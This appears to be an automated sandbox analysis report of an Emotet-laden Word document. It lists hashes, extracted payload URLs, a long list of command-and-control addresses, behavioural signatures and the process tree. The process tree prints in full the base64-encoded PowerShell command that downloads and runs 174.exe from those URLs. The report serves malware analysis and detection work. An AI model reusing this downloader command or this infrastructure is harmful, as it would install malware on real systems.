Analysis
-
max time kernel
135s -
max time network
152s -
platform
windows10_x64 -
resource
win10 -
submitted
31-07-2020 11:48
Static task
static1
Behavioral task
behavioral1
Sample
FILE-2020.doc
Resource
win7
General
-
Target
FILE-2020.doc
-
Size
175KB
-
MD5
56ab9ac3130bd66459fda70446ffa3e6
-
SHA1
ea46947eb8b33a8e135bc8e171027dee5800d5b2
-
SHA256
a3067b8e4a9a978df100c40ffc83927994928d08bd48b59b55789e1626a67e7e
-
SHA512
dafa8be16543a0cb8811652646df1a4bf943c437de03619b76d4ac3d3c573aa1e1b19eeb50be950b07f05d53881b51c7b82206aa815f07cc51dfc9731cdd3f7c
Malware Config
Extracted
http://rikotut.net/rikotut4/vka_spx_tlz/
http://ronnietucker.co.uk/fcm-dl/94_xeb_m7rfe9yj/
http://rivcon.net/images/ze1_r8_3jdpf63/
http://rollingturtle.com/music/isef_vmr_p/
http://ronsonpainting.com/photogallery/7_26kr_ngbv3sha/
Extracted
emotet
47.146.117.214:80
62.108.54.22:8080
212.51.142.238:8080
190.160.53.126:80
87.106.136.232:8080
74.208.45.104:8080
121.124.124.40:7080
124.45.106.173:443
76.27.179.47:80
210.165.156.91:80
61.19.246.238:443
81.2.235.111:8080
169.239.182.217:8080
181.230.116.163:80
139.130.242.43:80
46.105.131.87:80
139.59.60.244:8080
222.214.218.37:4143
41.60.200.34:80
200.55.243.138:8080
24.234.133.205:80
190.55.181.54:443
189.212.199.126:443
93.156.165.186:80
62.138.26.28:8080
62.75.141.82:80
176.111.60.55:8080
168.235.67.138:7080
109.117.53.230:443
5.196.74.210:8080
162.154.38.103:80
152.168.248.128:443
83.110.223.58:443
95.9.185.228:443
180.92.239.110:8080
209.141.54.221:8080
37.187.72.193:8080
113.160.130.116:8443
85.59.136.180:8080
79.98.24.39:8080
91.231.166.124:8080
185.94.252.104:443
108.48.41.69:80
95.179.229.244:8080
71.208.216.10:80
93.51.50.171:8080
78.24.219.147:8080
24.179.13.119:80
200.41.121.90:80
153.126.210.205:7080
104.236.246.93:8080
46.105.131.79:8080
201.173.217.124:443
50.116.86.205:8080
116.203.32.252:8080
157.245.99.39:8080
109.74.5.95:8080
203.153.216.189:7080
87.106.139.101:8080
137.59.187.107:8080
110.145.77.103:80
47.153.182.47:80
95.213.236.64:8080
24.43.99.75:80
209.182.216.177:443
173.91.22.41:80
5.39.91.110:7080
75.139.38.211:80
91.211.88.52:7080
37.139.21.175:8080
162.241.92.219:8080
104.131.11.150:443
70.167.215.250:8080
104.131.44.150:8080
103.86.49.11:8080
65.111.120.223:80
Signatures
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Drops file in System32 directory 1 IoCs
Processes:
174.exedescription ioc process File opened for modification C:\Windows\SysWOW64\midimap\KBDDV.exe 174.exe -
Suspicious use of SetWindowsHookEx 11 IoCs
Processes:
WINWORD.EXE174.exeKBDDV.exepid process 2920 WINWORD.EXE 2920 WINWORD.EXE 2920 WINWORD.EXE 2920 WINWORD.EXE 2920 WINWORD.EXE 2920 WINWORD.EXE 2920 WINWORD.EXE 2920 WINWORD.EXE 2920 WINWORD.EXE 3968 174.exe 416 KBDDV.exe -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 2920 WINWORD.EXE 2920 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 21 IoCs
Processes:
powersheLL.exeKBDDV.exepid process 1000 powersheLL.exe 1000 powersheLL.exe 1000 powersheLL.exe 416 KBDDV.exe 416 KBDDV.exe 416 KBDDV.exe 416 KBDDV.exe 416 KBDDV.exe 416 KBDDV.exe 416 KBDDV.exe 416 KBDDV.exe 416 KBDDV.exe 416 KBDDV.exe 416 KBDDV.exe 416 KBDDV.exe 416 KBDDV.exe 416 KBDDV.exe 416 KBDDV.exe 416 KBDDV.exe 416 KBDDV.exe 416 KBDDV.exe -
Blacklisted process makes network request 1 IoCs
Processes:
powersheLL.exeflow pid process 8 1000 powersheLL.exe -
Executes dropped EXE 2 IoCs
Processes:
174.exeKBDDV.exepid process 3968 174.exe 416 KBDDV.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
174.exedescription pid process target process PID 3968 wrote to memory of 416 3968 174.exe KBDDV.exe PID 3968 wrote to memory of 416 3968 174.exe KBDDV.exe PID 3968 wrote to memory of 416 3968 174.exe KBDDV.exe -
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
powersheLL.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1000 3844 powersheLL.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powersheLL.exedescription pid process Token: SeDebugPrivilege 1000 powersheLL.exe -
Emotet Payload 4 IoCs
Detects Emotet payload in memory.
Processes:
resource yara_rule behavioral2/memory/3968-8-0x0000000000580000-0x000000000058C000-memory.dmp emotet behavioral2/memory/3968-8-0x0000000000580000-0x000000000058C000-memory.dmp emotet behavioral2/memory/416-11-0x00000000020B0000-0x00000000020BC000-memory.dmp emotet behavioral2/memory/416-11-0x00000000020B0000-0x00000000020BC000-memory.dmp emotet -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\FILE-2020.doc" /o ""1⤵
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: AddClipboardFormatListener
- Enumerates system info in registry
-
C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exepowersheLL -e JABSAE8AVwBWAFQAZQBpAHQAPQAnAE8ARABLAEIATgBmAGcAYgAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGUAQwBgAFUAcgBJAHQAeQBwAFIATwBgAFQAbwBDAG8ATAAiACAAPQAgACcAdABsAHMAMQAyACwAIAB0AGwAcwAxADEALAAgAHQAbABzACcAOwAkAEkAWgBXAEYAVABjAG4AYQAgAD0AIAAnADEANwA0ACcAOwAkAEUAVQBJAEMARwBwAHQAcAA9ACcAQwBTAEYAWgBHAGMAbwBmACcAOwAkAFYAQwBYAEIATwBoAHEAeAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQASQBaAFcARgBUAGMAbgBhACsAJwAuAGUAeABlACcAOwAkAFoASQBTAFMAVgB4AGMAdAA9ACcARwBNAFEAWQBTAHkAdgB2ACcAOwAkAFIAUgBWAFQAQQBpAHcAZwA9AC4AKAAnAG4AZQAnACsAJwB3AC0AbwBiACcAKwAnAGoAJwArACcAZQBjAHQAJwApACAAbgBFAHQALgB3AGUAQgBjAEwAaQBFAE4AVAA7ACQARgBKAFEAUwBFAHEAYwBwAD0AJwBoAHQAdABwADoALwAvAHIAaQBrAG8AdAB1AHQALgBuAGUAdAAvAHIAaQBrAG8AdAB1AHQANAAvAHYAawBhAF8AcwBwAHgAXwB0AGwAegAvACoAaAB0AHQAcAA6AC8ALwByAG8AbgBuAGkAZQB0AHUAYwBrAGUAcgAuAGMAbwAuAHUAawAvAGYAYwBtAC0AZABsAC8AOQA0AF8AeABlAGIAXwBtADcAcgBmAGUAOQB5AGoALwAqAGgAdAB0AHAAOgAvAC8AcgBpAHYAYwBvAG4ALgBuAGUAdAAvAGkAbQBhAGcAZQBzAC8AegBlADEAXwByADgAXwAzAGoAZABwAGYANgAzAC8AKgBoAHQAdABwADoALwAvAHIAbwBsAGwAaQBuAGcAdAB1AHIAdABsAGUALgBjAG8AbQAvAG0AdQBzAGkAYwAvAGkAcwBlAGYAXwB2AG0AcgBfAHAALwAqAGgAdAB0AHAAOgAvAC8AcgBvAG4AcwBvAG4AcABhAGkAbgB0AGkAbgBnAC4AYwBvAG0ALwBwAGgAbwB0AG8AZwBhAGwAbABlAHIAeQAvADcAXwAyADYAawByAF8AbgBnAGIAdgAzAHMAaABhAC8AJwAuACIAUwBwAGAAbABJAFQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABJAE0AUABHAFoAcAByAHEAPQAnAEkARABEAFoAWgBhAGEAYwAnADsAZgBvAHIAZQBhAGMAaAAoACQASQBNAEkATgBHAHQAZgB1ACAAaQBuACAAJABGAEoAUQBTAEUAcQBjAHAAKQB7AHQAcgB5AHsAJABSAFIAVgBUAEEAaQB3AGcALgAiAEQAbwB3AE4AbABgAE8AQQBEAGAARgBpAGwAZQAiACgAJABJAE0ASQBOAEcAdABmAHUALAAgACQAVgBDAFgAQgBPAGgAcQB4ACkAOwAkAFoATABaAEwAQQBuAHoAbgA9ACcAQgBFAEEASABFAGsAZwBnACcAOwBJAGYAIAAoACgALgAoACcARwBlACcAKwAnAHQALQBJACcAKwAnAHQAZQBtACcAKQAgACQAVgBDAFgAQgBPAGgAcQB4ACkALgAiAGwARQBOAGAARwBgAFQASAAiACAALQBnAGUAIAAzADQANgAzADAAKQAgAHsAKABbAHcAbQBpAGMAbABhAHMAcwBdACcAdwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcwAnACkALgAiAGMAUgBlAGAAQQBgAFQARQAiACgAJABWAEMAWABCAE8AaABxAHgAKQA7ACQAUwBJAEQAQgBFAGcAdABwAD0AJwBIAE0AUABYAFEAYwB2AGoAJwA7AGIAcgBlAGEAawA7ACQAVwBNAEMASABNAG0AcABtAD0AJwBCAFoAUwBTAFQAaABrAGoAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAVwBLAFUARQBHAHgAbABmAD0AJwBMAEcASwBFAEkAYgBqAGoAJwA=1⤵
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
- Process spawned unexpected child process
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\174.exeC:\Users\Admin\174.exe1⤵
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\midimap\KBDDV.exe"C:\Windows\SysWOW64\midimap\KBDDV.exe"2⤵
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: EnumeratesProcesses
- Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\174.exe
-
C:\Users\Admin\174.exe
-
C:\Windows\SysWOW64\midimap\KBDDV.exe
-
memory/416-9-0x0000000000000000-mapping.dmp
-
memory/416-11-0x00000000020B0000-0x00000000020BC000-memory.dmpFilesize
48KB
-
memory/3968-8-0x0000000000580000-0x000000000058C000-memory.dmpFilesize
48KB